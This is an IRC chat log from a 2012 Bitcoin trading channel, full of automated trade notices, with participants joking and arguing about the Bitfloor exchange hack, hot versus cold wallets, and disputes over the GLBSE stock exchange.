BTC [-] Sep 04 06:02:38 [GLBSE] [OBSI.HRPT] 5 @ 0.1033 = 0.5165 BTC [-] **** BEGIN LOGGING AT Tue Sep 4 18:40:00 2012 Sep 04 18:51:46 so the advantage of running a stock exchange : my address now gets all sorts of "insider info" about various bs penny stocks. Sep 04 18:54:53 [GLBSE] [ASICMINER] 2 @ 0.1494 = 0.2988 BTC [+] Sep 04 18:56:02 [GLBSE] [BAKEWELL] 1 @ 0.15 BTC Sep 04 18:57:02 [GLBSE] [YABMC] 2 @ 0.1182 = 0.2364 BTC [-] Sep 04 18:57:32 [GLBSE] [PUREMINING] 1 @ 0.0955 BTC [-] Sep 04 18:58:16 [GLBSE] [BBBB] 300 @ 0.00024 = 0.072 BTC [+] Sep 04 19:02:33 [GLBSE] [NYAN.C] 1 @ 0.74 BTC [+] Sep 04 19:08:52 [GLBSE] [ASICMINER] 6 @ 0.1494 = 0.8964 BTC [+] Sep 04 19:17:12 [GLBSE] [BITBOND] 6 @ 0.3863 = 2.3178 BTC [-] Sep 04 19:20:30 [GLBSE] [PUREMINING] 2 @ 0.0955 = 0.191 BTC [-] Sep 04 19:23:14 welcome home nefario Sep 04 19:24:19 [GLBSE] [NASTY] 1 @ 0.6 BTC [-] Sep 04 19:24:32 [GLBSE] [PUREMINING] 22 @ 0.0956 = 2.1032 BTC [+] Sep 04 19:25:03 [GLBSE] [NASTY] 2 @ 0.586 = 1.172 BTC [-] Sep 04 19:28:25 [MPEX] [S.MPOE] 1300 @ 0.00039051 = 0.5077 BTC [-] Sep 04 19:29:53 [GLBSE] [OBSI.HRPT] 4 @ 0.10546 = 0.4218 BTC [-] Sep 04 19:34:34 [GLBSE] [V.HRL] 1 @ 1 BTC Sep 04 19:36:27 [GLBSE] [OBSI.HRPT] 25 @ 0.10546 = 2.6365 BTC [-] Sep 04 19:37:35 [GLBSE] [OBSI.HRPT] 3 @ 0.10546 = 0.3164 BTC [-] Sep 04 19:39:50 [GLBSE] [OBSI.HRPT] 1 @ 0.10546 BTC [-] Sep 04 19:46:46 [MPEX] [F.GIGA.ETF] 6972 @ 0.00076474 = 5.3318 BTC [-] Sep 04 19:46:47 [MPEX] [F.GIGA.ETF] 13528 @ 0.00076912 = 10.4047 BTC [+] Sep 04 19:46:49 [MPEX] [S.MPOE] 19700 @ 0.0003915 = 7.7126 BTC [+] Sep 04 19:46:50 [MPEX] [S.MPOE] 39906 @ 0.0003902 = 15.5713 BTC [-] Sep 04 19:46:51 [MPEX] [S.MPOE] 1494 @ 0.00039009 = 0.5828 BTC [-] Sep 04 19:48:23 [GLBSE] [GIGAMINING] 6 @ 0.7313101 = 4.3879 BTC [-] Sep 04 19:48:24 [GLBSE] [GIGAMINING] 2 @ 0.7312102 = 1.4624 BTC [-] Sep 04 19:48:25 [GLBSE] [GIGAMINING] 2 @ 0.7312101 = 1.4624 BTC [-] Sep 04 19:50:20 [GLBSE] [FPGAMINING] 10 @ 0.74 = 7.4 BTC [+] Sep 04 19:51:56 [GLBSE] [BITBOND] 17 @ 0.3999 = 6.7983 BTC [+] Sep 04 19:54:29 [MPEX] [F.GIGA.ETF] 2172 @ 0.00076912 = 1.6705 BTC [+] Sep 04 19:54:31 [MPEX] [F.GIGA.ETF] 7139 @ 0.00077166 = 5.5089 BTC [+] Sep 04 19:54:32 [MPEX] [F.GIGA.ETF] 12451 @ 0.00077238 = 9.6169 BTC [+] Sep 04 19:54:33 [MPEX] [F.GIGA.ETF] 24500 @ 0.00077542 = 18.9978 BTC [+] Sep 04 19:54:34 [MPEX] [F.GIGA.ETF] 19100 @ 0.00077602 = 14.822 BTC [+] Sep 04 19:54:35 [MPEX] [F.GIGA.ETF] 13600 @ 0.00077638 = 10.5588 BTC [+] Sep 04 19:54:36 [MPEX] [F.GIGA.ETF] 5800 @ 0.00077904 = 4.5184 BTC [+] Sep 04 19:54:37 [MPEX] [F.GIGA.ETF] 7380 @ 0.00078121 = 5.7653 BTC [+] Sep 04 19:54:38 [MPEX] [F.GIGA.ETF] 2000 @ 0.00078226 = 1.5645 BTC [+] Sep 04 19:54:39 [MPEX] [F.GIGA.ETF] 7500 @ 0.00078402 = 5.8802 BTC [+] Sep 04 19:54:40 [MPEX] [F.GIGA.ETF] 3246 @ 0.00080434 = 2.6109 BTC [+] Sep 04 19:54:41 [MPEX] [F.GIGA.ETF] 230 @ 0.00080841 = 0.1859 BTC [+] Sep 04 19:54:42 [MPEX] [F.GIGA.ETF] 4882 @ 0.00081209 = 3.9646 BTC [+] Sep 04 19:54:44 [GLBSE] [GIGAMINING] 1 @ 0.79979 BTC [+] Sep 04 19:55:49 [MPEX] [S.MPOE] 11000 @ 0.00039009 = 4.291 BTC [-] Sep 04 19:56:04 [GLBSE] [BITBOND] 9 @ 0.4 = 3.6 BTC [+] Sep 04 19:56:48 [GLBSE] [BITBOND] 6 @ 0.3999 = 2.3994 BTC [-] Sep 04 19:57:32 [GLBSE] [TYGRR.BOND-P] 5 @ 0.09 = 0.45 BTC [+] Sep 04 20:04:38 [MPEX] [S.MPOE] 200 @ 0.00039557 = 0.0791 BTC [+] Sep 04 20:04:40 [MPEX] [S.MPOE] 9481 @ 0.00039586 = 3.7531 BTC [+] Sep 04 20:04:41 [MPEX] [S.MPOE] 11972 @ 0.00039654 = 4.7474 BTC [+] Sep 04 20:05:54 [GLBSE] [YABMC] 9 @ 0.117 = 1.053 BTC [-] Sep 04 20:07:02 [GLBSE] [OBSI.HRPT] 63 @ 0.10545 = 6.6434 BTC [-] Sep 04 20:07:03 [GLBSE] [OBSI.HRPT] 37 @ 0.1054599 = 3.902 BTC [+] Sep 04 20:12:41 bitfloor got gotten https://bitcointalk.org/index.php?topic=105818.0 Sep 04 20:12:48 oh ?! Sep 04 20:13:27 wait, wasn't it a scam long ago ? Sep 04 20:13:33 or no, im thinking about bitscalper. Sep 04 20:13:37 yeah Sep 04 20:13:43 bitscalper was scam Sep 04 20:13:57 people need to get out of this bit bs Sep 04 20:14:12 it's entirely contrary to their own interest. you make a logo with bit in it, people see and remember "bit" Sep 04 20:14:21 and then where are you ? o, "that bit service" ? pff Sep 04 20:14:46 butt* Sep 04 20:14:56 now buttpumpkin on the other hand... Sep 04 20:15:01 that has badonkadonk staying power. Sep 04 20:15:26 speaking of names Sep 04 20:15:28 i need one. Sep 04 20:15:37 [GLBSE] [CIUCIU.BOND] 90 @ 0.11 = 9.9 BTC [+] Sep 04 20:15:37 dingle dongle ticolensic Sep 04 20:16:27 or Sep 04 20:16:28 Shönendanker-Kalbsfleisch-Mittler-Raucher von Hautkopft of Ulm Sep 04 20:16:36 :p Sep 04 20:17:02 mircea_popescu, theres a shitton of bit* domains and buisnesses Sep 04 20:17:04 [GLBSE] [JTME] 11 @ 0.9498 = 10.4478 BTC [-] Sep 04 20:17:08 kakobrekla yes i know Sep 04 20:17:15 bitstamp, bitpay, Sep 04 20:17:21 two well known and legit Sep 04 20:17:49 bitinstant Sep 04 20:17:58 bitfloor apparently also :) Sep 04 20:18:19 quote bitfloor: the attacker gained accesses to an unencrypted backup of the wallet keys (the actual keys live in an encrypted area) << Nobody take security seariously here... Sep 04 20:18:23 well no. bitinstant is that thing with the card no ? Sep 04 20:18:40 rdponticelli the "ACTUAL" keys you see. Sep 04 20:18:42 i take security semi seriously Sep 04 20:18:59 the problem with the current generation of youths is they honestly believe the designations they give to things in their heads are binding to the world at large. Sep 04 20:19:07 if they call their ex a slut, she IS a slut Sep 04 20:19:17 if they call these keys the UNACTUAL keys then they are "unactual" Sep 04 20:19:18 All keys are the "actual" keys Sep 04 20:19:24 in normal time. Sep 04 20:19:28 lol Sep 04 20:19:34 OMG Sep 04 20:20:12 Well... Sep 04 20:20:28 [MPEX] [S.MPOE] 22071 @ 0.00039673 = 8.7562 BTC [+] Sep 04 20:22:38 [MPEX] [S.MPOE] 7628 @ 0.00039544 = 3.0164 BTC [-] Sep 04 20:22:39 [MPEX] [S.MPOE] 2687 @ 0.00039684 = 1.0663 BTC [+] Sep 04 20:22:40 [MPEX] [S.MPOE] 31285 @ 0.00039825 = 12.4593 BTC [+] Sep 04 20:27:46 [GLBSE] [OBSI.HRPT] 163 @ 0.1054599 = 17.19 BTC [+] Sep 04 20:27:48 [GLBSE] [OBSI.HRPT] 200 @ 0.1054799 = 21.096 BTC [+] Sep 04 20:27:49 [GLBSE] [OBSI.HRPT] 37 @ 0.105499 = 3.9035 BTC [+] Sep 04 20:28:59 [GLBSE] [FPGAMINING] 1 @ 0.74 BTC [+] Sep 04 20:29:23 [GLBSE] [BIF.1YR.LOAN] 7 @ 0.94230769 = 6.5962 BTC [+] Sep 04 20:31:50 [GLBSE] [PUREMINING] 65 @ 0.0956 = 6.214 BTC [+] Sep 04 20:33:03 [GLBSE] [PUREMINING] 97 @ 0.09567 = 9.28 BTC [+] Sep 04 20:35:26 [GLBSE] [FDBF] 2 @ 0.14999999 = 0.3 BTC [+] Sep 04 20:35:52 [GLBSE] [GIGAMINING] 3 @ 0.79979 = 2.3994 BTC [+] Sep 04 20:50:14 [GLBSE] [TYGRR.BOND-P] 5 @ 0.0899 = 0.4495 BTC [-] Sep 04 20:52:13 [MPEX] [O.BTCUSD.C080T] 885 @ 0.33593928 = 297.3063 BTC [-] Sep 04 20:52:25 [MPEX] [O.BTCUSD.P130T] 885 @ 0.40300823 = 356.6623 BTC [+] Sep 04 20:54:13 [GLBSE] [JAH] 2 @ 0.1479 = 0.2958 BTC [+] Sep 04 20:55:04 [GLBSE] [BDK.BND] 40 @ 0.1 = 4 BTC [+] Sep 04 20:55:06 [GLBSE] [JAH] 30 @ 0.148 = 4.44 BTC [+] Sep 04 20:56:53 [GLBSE] [JAH] 40 @ 0.149 = 5.96 BTC [+] Sep 04 20:59:24 [GLBSE] [ZETA-MINING] 1 @ 0.191 BTC [+] Sep 04 20:59:26 [GLBSE] [ZETA-MINING] 1 @ 0.19 BTC [-] Sep 04 20:59:26 [GLBSE] [ZETA-MINING] 1 @ 0.149 BTC [-] Sep 04 20:59:27 [GLBSE] [ZETA-MINING] 9 @ 0.122 = 1.098 BTC [-] Sep 04 20:59:29 [GLBSE] [ZETA-MINING] 37 @ 0.1081 = 3.9997 BTC [-] Sep 04 20:59:30 [GLBSE] [ZETA-MINING] 1 @ 0.10800001 BTC [-] Sep 04 20:59:31 [GLBSE] [ZETA-MINING] 500 @ 0.108 = 54 BTC [-] Sep 04 20:59:52 [GLBSE] [NYAN.A] 5 @ 1 = 5 BTC [-] Sep 04 20:59:53 [GLBSE] [NYAN.A] 45 @ 1.01 = 45.45 BTC [+] Sep 04 21:01:38 [GLBSE] [OBSI.HRPT] 1 @ 0.105499 BTC [+] Sep 04 21:03:22 [GLBSE] [ZETA-MINING] 1 @ 0.10799999 BTC [-] Sep 04 21:04:15 [GLBSE] [NYAN.B] 25 @ 1 = 25 BTC [+] Sep 04 21:06:37 [MPEX] [F.GIGA.ETF] 118 @ 0.00081209 = 0.0958 BTC [+] Sep 04 21:06:38 [MPEX] [F.GIGA.ETF] 5951 @ 0.00081396 = 4.8439 BTC [+] Sep 04 21:06:59 ja pretty much Sep 04 21:07:05 [GLBSE] [YABMC] 4 @ 0.117 = 0.468 BTC [-] Sep 04 21:08:15 what? Sep 04 21:08:29 just talking Sep 04 21:08:31 to myself Sep 04 21:08:32 ... Sep 04 21:08:48 [GLBSE] [ZETA-MINING] 36 @ 0.1079 = 3.8844 BTC [-] Sep 04 21:08:50 [GLBSE] [ZETA-MINING] 332 @ 0.108 = 35.856 BTC [+] Sep 04 21:09:08 Oh... I see... Sep 04 21:10:00 I've seen before people think aloud... but not think visibly... Sep 04 21:10:21 wrong window actually Sep 04 21:11:54 bitfloor? Sep 04 21:12:00 [GLBSE] [JTME] 4 @ 0.9498 = 3.7992 BTC [-] Sep 04 21:12:01 unencrypted backup; "a small majority" < WTF is a small majority? Sep 04 21:12:03 what statement Sep 04 21:12:12 https://bitcointalk.org/index.php?topic=105818.0 Sep 04 21:13:02 lol Sep 04 21:13:06 small majority Sep 04 21:13:12 Im guessing its a typo Sep 04 21:14:00 god damn, a small majority == nearly all Sep 04 21:14:03 apparently Sep 04 21:14:16 from what I read it's almost all the hot wallet Sep 04 21:14:23 dammit, i'm sure i had a few coins in there Sep 04 21:14:33 nefario: yeah, and there wasn't really a cold wallet Sep 04 21:14:49 fucking morons Sep 04 21:15:19 ooooooooh Sep 04 21:15:21 ouch Sep 04 21:15:46 thats why i stay away from exchange biz Sep 04 21:16:32 lmao small majority. Sep 04 21:16:58 i must confess, people keep saying btc is not backed by anything Sep 04 21:17:02 yes it is. btc is backed by lulz. Sep 04 21:17:06 [MPEX] [S.MPOE] 17815 @ 0.00039825 = 7.0948 BTC [+] Sep 04 21:17:08 [MPEX] [S.MPOE] 17634 @ 0.00040186 = 7.0864 BTC [+] Sep 04 21:17:27 and drama. Sep 04 21:17:35 ya but mostly lulz Sep 04 21:17:40 drulz Sep 04 21:17:44 (now you say no, mostly drama and i say fuck you) Sep 04 21:18:01 A SMALL MAJORITY OF LULZ! Sep 04 21:18:15 Facepalm type of lulz Sep 04 21:18:26 drama type of lulz Sep 04 21:18:44 (waiting for the fuck you..) Sep 04 21:18:55 o o sorry. fuck type of you. Sep 04 21:19:05 It's reaching the point where it's tragedy more than drama Sep 04 21:19:12 tragedlulz. Sep 04 21:19:26 dramgedy Sep 04 21:19:49 you know someone's registering all these domains right ? Sep 04 21:20:02 :D Sep 04 21:20:08 what domains Sep 04 21:20:48 The nice thing about btc is that comedy and tragedy happens simultaneously Sep 04 21:21:13 http://polimedia.us/dtng/c/src/134677810274.png << which is the older sister ? Sep 04 21:21:24 You don't have to wait to the other side of the story Sep 04 21:21:28 rdponticelli that's why it's called drama. tragedy + comedy. Sep 04 21:21:57 how much for the two Sep 04 21:21:59 Yea, but the facepalm part is missing Sep 04 21:22:01 :D Sep 04 21:22:18 kakobrekla a pair of actual keys. Sep 04 21:22:25 :DDD Sep 04 21:22:28 and a small majority. Sep 04 21:22:40 bah, my majority is large. Sep 04 21:22:54 your majority is large ? my minority is large! Sep 04 21:22:56 Ok, this is getting ridiculous, nearly every goddamn exchange, trading platform, online wallet have to close because "someone got access to servers" Sep 04 21:23:05 [GLBSE] [FPGAMINING] 20 @ 0.74 = 14.8 BTC [+] Sep 04 21:23:08 And there's never a godamn cold wallet ever Sep 04 21:23:14 Don't people learn??? Sep 04 21:23:15 BTC-Mining why are you such a hater ? they don't make servers like they used to Sep 04 21:23:17 all sluts now. Sep 04 21:23:46 Oh, that's right... I'm ranting about the lack of cold wallet tho. Sep 04 21:23:49 and tbh, what i learned is to not have a hot wallet. Sep 04 21:24:04 A hot wallet is practical... Sep 04 21:24:08 i don't care. Sep 04 21:24:15 im in the business of providing safety. Sep 04 21:24:20 Just that it should have a very small amount Sep 04 21:24:26 so then it'd be unpractical. Sep 04 21:24:46 It would allow instant withdrawal Sep 04 21:24:50 so ? Sep 04 21:25:07 That's what you'd expect from an exchange/online wallet Sep 04 21:25:22 Not wait 12 hour for the admin to login and process manually Sep 04 21:25:22 you can expect it till you're blue in the face. what i expect from an exchange is TO NOT BE OWNED Sep 04 21:25:33 right, because you can't plan your life 12 hours in advance. Sep 04 21:26:21 Hey, when you find something and want to pay for it, but have an online wallet, you still want to pay immediately Sep 04 21:26:45 maybe my spartan ideas are more adequate to some applications than others. Sep 04 21:27:12 Thing is, you can keep operating with a hot wallet for instant withdrawal if you take care about security and keep it small enough that you can cover a potential hack. Sep 04 21:27:30 right. theoretically. Sep 04 21:27:54 At worse some payments can't be processed immediately I guess. Sep 04 21:28:10 hacks seem to be garaunteed Sep 04 21:28:57 so having a hot wallet seems to be a garaunteed loss Sep 04 21:29:12 [GLBSE] [GIGAMINING] 1 @ 0.79979 BTC [+] Sep 04 21:29:20 this_is_dog hello ? Sep 04 21:29:21 and money shouldn't be a business' loss leader Sep 04 21:29:31 hello Sep 04 21:29:34 ues Sep 04 21:29:37 this is dog Sep 04 21:29:39 it should be doublemints or somethign Sep 04 21:29:45 dog hello ? Sep 04 21:30:04 http://img3i.www.spoki.lv/upload2/articles/51/516169/images/HELLO-YES-THIS-IS-DOG-11.jpg Sep 04 21:30:38 http://img3i.www.spoki.lv/upload2/articles/51/516169/images/HELLO-YES-THIS-IS-DOG-11.jpg Sep 04 21:30:57 omg Sep 04 21:30:59 Last night, a few of our servers were compromised. Sep 04 21:31:02 dude this is so cute Sep 04 21:31:05 we had 56349875 servers Sep 04 21:31:09 2837 were compromised Sep 04 21:31:13 gtfo, he had a vps. Sep 04 21:31:13 lol Sep 04 21:31:30 a double dog Sep 04 21:31:53 http://www.goodtimecharlieblog.com/wp-content/uploads/image-import/_lZoQPvGfdG8/SguzVajVAWI/AAAAAAAABOY/axGQ35qUcJ8/s400/DoubleDong.jpg Sep 04 21:31:56 build a better double dog... Sep 04 21:32:00 [MPEX] [S.MPOE] 6853 @ 0.00040186 = 2.7539 BTC [+] Sep 04 21:32:13 ...and you won't need no hss Sep 04 21:33:57 smickles: MtGox seems to be fine. They got hacked at some point but managed through it and improved security. Sep 04 21:34:00 BitFloor is currently the #4 USD exchange and #1 in the US. Sep 04 21:34:04 how did he figure that ? Sep 04 21:34:19 The thing is, any server used for financial transactions is a prime target for attacks Sep 04 21:34:32 double dog dare? Sep 04 21:34:40 In any case, it WAS Sep 04 21:34:58 well anyway that forum post killed him Sep 04 21:35:05 You can't keep your position after losing all your assets Sep 04 21:35:06 that's not how you go about what he claims he's trying to accomplish Sep 04 21:35:33 And having secure servers for financial transactions is a VERY COMPLEX FIELD. There is absolutly ZERO room for error and must be set up correctly. Sep 04 21:35:44 Which tends to cost a lot to implement. Sep 04 21:35:51 right. Sep 04 21:35:59 Which is why it seems we're going more and more centralized with MtGox Sep 04 21:36:17 All the small exchanges/wallet don't have the means to do it. Sep 04 21:36:21 That's how we end up on the financial system we know today Sep 04 21:36:30 5% any transaction.... Sep 04 21:37:02 They don't even TRY! Everything on hot goddam wallet. Sep 04 21:37:12 I'm sure that btc can be a lot more efficient Sep 04 21:37:26 But we need people taking this seriously Sep 04 21:37:34 Well, they are, som Sep 04 21:37:42 Some, yes Sep 04 21:38:02 A small minority Sep 04 21:38:04 :D Sep 04 21:38:08 yeah, we kinda need a serious exchange competitor for mtgox. Sep 04 21:38:48 I hope OT keeps growing Sep 04 21:39:00 Looks like an interesting job Sep 04 21:39:14 New withdrawals are currently on hold while I work through the future of the exchange. Sep 04 21:39:14 That is unacceptable. Regardless of the future of the exchange you have an obligation to disburse funds to the ACH account on record. Sep 04 21:39:20 o boy, this will be nice thick drama. Sep 04 21:39:44 I can't afford more drama... Sep 04 21:39:49 I used to have a life Sep 04 21:39:55 Well, sort of... Sep 04 21:40:03 mircea_popescu: yeah, i think D&T may have a good chunk of usd held hostage now Sep 04 21:40:21 smickles interesting how that works. Sep 04 21:40:42 rdponticelli wife&girlfriend or just wife/just gf ? Sep 04 21:41:06 just gf Sep 04 21:41:19 Turning into a wife now... Sep 04 21:41:35 Well, sort of... Sep 04 21:41:51 I won't sign anything... Sep 04 21:42:05 We just live together Sep 04 21:42:19 It was in fact a joke Sep 04 21:42:32 "Secure your website first then bark in front of us u fucking k1d u really cant compare us so grew up and secure all bitcoins site then bark here" Sep 04 21:42:41 this should be on a site somewhere. Sep 04 21:42:48 It's like a wife, bc I'm almost all day with this play money... Sep 04 21:42:49 lol Sep 04 21:44:40 lol Sep 04 21:44:53 this is why a gf helps, you tell each you're gonna spend the day with the other. Sep 04 21:45:02 [GLBSE] [TYGRR.BOND-P] 10 @ 0.0899 = 0.899 BTC [-] Sep 04 21:51:48 supplemental (yet unrelated) drama : romanian wanna-be author who closed his blog last year cause i laughed at his pretense came back to declare that i'm obviously nuts for thinking he closed his blog because of me. Sep 04 21:54:45 [GLBSE] [FDBF] 50 @ 0.14999999 = 7.5 BTC [+] Sep 04 21:57:35 [GLBSE] [ASICMINER] 11 @ 0.1494 = 1.6434 BTC [+] Sep 04 21:57:43 asicminer up 50% Sep 04 21:57:45 Hmm! Sep 04 21:58:01 !ticker asicminer Sep 04 21:58:11 [GLBSE:ASICMINER] [Bid: 0.1411] [Ask: 0.1494] [Spread: 0.0083] [Last: 0.1494] [24hVol: 100.75611112] [7dAvg: 0.11819219] Sep 04 21:58:21 not much volume. Sep 04 21:58:45 [GLBSE] [ASICMINER] 28 @ 0.1411 = 3.9508 BTC [-] Sep 04 21:58:47 [GLBSE] [ASICMINER] 5 @ 0.14100011 = 0.705 BTC [-] Sep 04 21:58:47 [GLBSE] [ASICMINER] 10 @ 0.141 = 1.41 BTC [-] Sep 04 21:58:49 [GLBSE] [ASICMINER] 10 @ 0.14000001 = 1.4 BTC [-] Sep 04 21:58:50 [GLBSE] [ASICMINER] 45 @ 0.14 = 6.3 BTC [-] Sep 04 21:58:51 [GLBSE] [ASICMINER] 5 @ 0.1351 = 0.6755 BTC [-] Sep 04 21:58:52 [GLBSE] [ASICMINER] 10 @ 0.13311111 = 1.3311 BTC [-] Sep 04 21:58:53 [GLBSE] [ASICMINER] 20 @ 0.13311111 = 2.6622 BTC [-] Sep 04 21:58:55 [GLBSE] [ASICMINER] 50 @ 0.13311111 = 6.6556 BTC [-] Sep 04 21:58:56 [GLBSE] [ASICMINER] 17 @ 0.133111 = 2.2629 BTC [-] Sep 04 21:59:18 You took profit usagi? Sep 04 21:59:26 a little Sep 04 21:59:30 lol Sep 04 21:59:42 !ticker asicminer Sep 04 21:59:44 [GLBSE:ASICMINER] [Bid: 0.1411] [Ask: 0.1494] [Spread: 0.0083] [Last: 0.133111] [24hVol: 100.75611112] [7dAvg: 0.11819219] Sep 04 21:59:52 umm wtf ? Sep 04 22:01:18 bots. Sep 04 22:01:36 is the data cached or something ? Sep 04 22:02:02 [GLBSE] [GIGAMINING] 7 @ 0.79979 = 5.5985 BTC [+] Sep 04 22:02:27 !ticker asicminer Sep 04 22:02:35 [GLBSE:ASICMINER] [Bid: 0.1411] [Ask: 0.1494] [Spread: 0.0083] [Last: 0.133111] [24hVol: 100.75611112] [7dAvg: 0.11819219] Sep 04 22:02:43 pff this is useless. Sep 04 22:02:50 [GLBSE] [GIGAMINING] 9 @ 0.79989 = 7.199 BTC [+] Sep 04 22:03:32 !pl ASICMINER 0.09 Sep 04 22:03:33 Requesting data from GLBSE (might take a while). Sep 04 22:03:36 No dividend payments yet. Sep 04 22:03:52 bug! Sep 04 22:04:47 it paid dividends ? Sep 04 22:05:40 [GLBSE] [OBSI.HRPT] 3 @ 0.105499 = 0.3165 BTC [+] Sep 04 22:06:42 [GLBSE] [GIGAMINING] 4 @ 0.8 = 3.2 BTC [+] Sep 04 22:09:14 [MPEX] [O.BTCUSD.C010T] 1000 @ 0.90590417 = 905.9042 BTC [-] Sep 04 22:10:26 [GLBSE] [BAKEWELL] 10 @ 0.125 = 1.25 BTC [-] Sep 04 22:13:56 [GLBSE] [ASICMINER] 83 @ 0.133111 = 11.0482 BTC [-] Sep 04 22:13:57 [GLBSE] [ASICMINER] 5 @ 0.13 = 0.65 BTC [-] Sep 04 22:13:59 [GLBSE] [ASICMINER] 20 @ 0.125 = 2.5 BTC [-] Sep 04 22:18:05 [GLBSE] [OBSI.HRPT] 1 @ 0.1042 BTC [-] Sep 04 22:18:06 [GLBSE] [OBSI.HRPT] 30 @ 0.1041 = 3.123 BTC [-] Sep 04 22:18:07 [GLBSE] [OBSI.HRPT] 22 @ 0.10351 = 2.2772 BTC [-] Sep 04 22:18:08 [GLBSE] [OBSI.HRPT] 10 @ 0.1025 = 1.025 BTC [-] Sep 04 22:18:09 [GLBSE] [OBSI.HRPT] 21 @ 0.1023 = 2.1483 BTC [-] Sep 04 22:18:10 [GLBSE] [OBSI.HRPT] 99 @ 0.1023 = 10.1277 BTC [-] Sep 04 22:18:11 [GLBSE] [OBSI.HRPT] 2 @ 0.10226 = 0.2045 BTC [-] Sep 04 22:18:12 [GLBSE] [OBSI.HRPT] 100 @ 0.10225 = 10.225 BTC [-] Sep 04 22:18:13 [GLBSE] [OBSI.HRPT] 200 @ 0.102201 = 20.4402 BTC [-] Sep 04 22:18:14 [GLBSE] [OBSI.HRPT] 15 @ 0.102113 = 1.5317 BTC [-] Sep 04 22:18:19 https://bitcointalk.org/index.php?topic=64962.msg1157305#msg1157305 i think this is a pretty decent summation of the forum. Sep 04 22:18:37 anon gives reading schedule to the pr chick for the place that does btc options. Sep 04 22:18:56 maybe his services would be so much more valuable as an (pro bono) advisor to the us president ? Sep 04 22:20:16 [GLBSE] [OBSI.HRPT] 85 @ 0.102113 = 8.6796 BTC [-] Sep 04 22:20:17 [GLBSE] [OBSI.HRPT] 100 @ 0.102111 = 10.2111 BTC [-] Sep 04 22:20:57 [GLBSE] [OBSI.HRPT] 30 @ 0.1015 = 3.045 BTC [-] Sep 04 22:22:01 [MPEX] [O.BTCUSD.C010T] 800 @ 0.90590417 = 724.7233 BTC [-] Sep 04 22:24:37 "Nice... GLBSE is dead for me. My money will be gone in some days and i dont think i will take the risk again to threw money at glbse when even after carefully checking a share out you can lose everything. Thanks!" Sep 04 22:24:48 anyone care to guess what comp he's disucssing ? Sep 04 22:25:07 not dmc. Sep 04 22:25:49 [GLBSE] [OBSI.HRPT] 3 @ 0.1021 = 0.3063 BTC [+] Sep 04 22:26:00 Oh you mean the guy that admitted he didn't know how his account was compromised? Sep 04 22:26:03 Mircea I hope for your sake Sep 04 22:26:10 That no MPEX user ever is compromised... in the same way Sep 04 22:26:24 usagi nope, this has nothing to do. Diablo-D3 yep exactly dmc. Sep 04 22:26:26 You know what I mean? Sep 04 22:26:39 i know you got the wrong story :) Sep 04 22:26:48 I got the same story as you Sep 04 22:26:52 because I read it in the same place... Sep 04 22:26:58 sigh. Sep 04 22:27:02 Well at least you admit you got it wrong, indirectly anwyay. Sep 04 22:27:16 Now that we've moved past that, whats going on with DMC *now*? :) Sep 04 22:27:23 at the current time we are not discussing how global scam exchange is intrinsicly unsafe. we are discussing how one asset in there defrauded investors of ~90% of their investment. Sep 04 22:27:25 different stories. Sep 04 22:27:46 He didn't. You got the wrong story :) Sep 04 22:27:50 o i c. Sep 04 22:27:57 But as usual, you just go by rumor and innuendo Sep 04 22:28:02 If you want to know what happened you could ask DMC Sep 04 22:28:04 well... tell it to the guy with the loss. Sep 04 22:28:08 err Diablo -- or me Sep 04 22:28:19 im not really interested in either your or diablo's version of "what happened". i got that. Sep 04 22:28:25 Why bother, isn't it obvious? Sep 04 22:28:29 what i;m interested in is the investor's version of what happened. Sep 04 22:28:33 You yourself feel mining bonds are a dead end Sep 04 22:28:39 usagi it was a quote. Sep 04 22:28:42 Oh right, man on the street, right? Sep 04 22:28:45 i am no party in this. Sep 04 22:28:52 no, not man on the street. INVESTOR. Sep 04 22:28:55 I have a newspaper you might be interested in.. called the National Examiner. Sep 04 22:28:59 moo Sep 04 22:29:00 sigh. Sep 04 22:29:05 [GLBSE] [FPGAMINING] 5 @ 0.74 = 3.7 BTC [+] Sep 04 22:29:16 dude. do you understand that your pathetic scam-thingee only works as long as you can find suckers to "invest" in it ? Sep 04 22:29:27 There you go calling it 'my' exchange again. Sep 04 22:29:41 because you have no ownership interest whatsoever, i forgot. Sep 04 22:29:48 Right. Sep 04 22:29:48 my bad. Sep 04 22:29:55 I have no ownership ineterst whatsoever. Sep 04 22:29:58 s/your/that Sep 04 22:31:23 Would you like me to register with gribble so you can take a screenshot of me saying that and make blog post about it? Sep 04 22:31:35 mircea, you know you complain about the way GLBSE is mostly unregulated as to which assets are allowed and poor speed... not that it's a "scam-thingee" Sep 04 22:31:54 [GLBSE] [ASICMINER] 1 @ 0.1249 BTC [-] Sep 04 22:32:01 Although it indeed has hosted many scammy things. Sep 04 22:32:12 i do this guilty by association thing. Sep 04 22:32:35 yes Sep 04 22:32:40 For example, it's 'my' exchange Sep 04 22:32:44 therefore I am a scammer. Sep 04 22:32:54 i dun recall saying that. did i say you're a scammer somewhere ? Sep 04 22:33:02 Yes you did. Sep 04 22:33:04 quote ? Sep 04 22:33:08 You said I was scamming people. Sep 04 22:33:12 yes, but quote. Sep 04 22:33:16 [04:29:14] dude. do you understand that your pathetic scam-thingee only works as long as you can find suckers to "invest" in it ? Sep 04 22:33:27 Oh really, My exchange, as long as I can find suckers. Sep 04 22:33:29 [GLBSE] [FDBF] 84 @ 0.14999999 = 12.6 BTC [+] Sep 04 22:33:30 didn't you just protest and i just corrected it ? Sep 04 22:33:35 Mircea you need to learn when to shut the fuck up. Sep 04 22:33:41 you is both the plural and the singular 2nd person you know. Sep 04 22:33:59 This isn't you against the world. Learn to play with other kids. Sep 04 22:34:00 Aye, under that logic, an unregulated currency like bitcoin is guilty of money laundering, scamming, gambling and multiple other vices. Therefor, bitcoin is a "scam-thingee" too? Sep 04 22:34:13 BTC-Mining well, there's some dampening at work. Sep 04 22:34:31 Like the fact it cannot be regulated at all, unlike GLBSE Sep 04 22:34:36 the issue here isn't that "it happens". the issue is that it happens with regularity. "a small majority" as they say. Sep 04 22:34:37 Yes, I suppose Sep 04 22:35:13 moreover, if you run a bar where patrons are regularly mugged, your connection to the muggings is stronger than the connection between guineeas and mugging. Sep 04 22:35:31 Didn't Nefario stop accepting new issues and was considering severely ramping up the requirements for IPOs? Sep 04 22:35:41 Hopefully it gets more regulated. Sep 04 22:36:06 yes, he did. this happened mostly because people we won't name don't know when to shut the fuck up. Sep 04 22:37:12 Ah, yes. More drama? Sep 04 22:37:35 drama is crucial. Sep 04 22:37:37 Hi ciuciu Sep 04 22:37:46 I noticed you stopped trolling the YARR thread :> is everything ok? Sep 04 22:38:21 Of course it is crucial... that's what makes people do rash decisions Sep 04 22:38:43 and rash decisions makes good business opportunities. Sep 04 22:39:04 BTC-Mining not 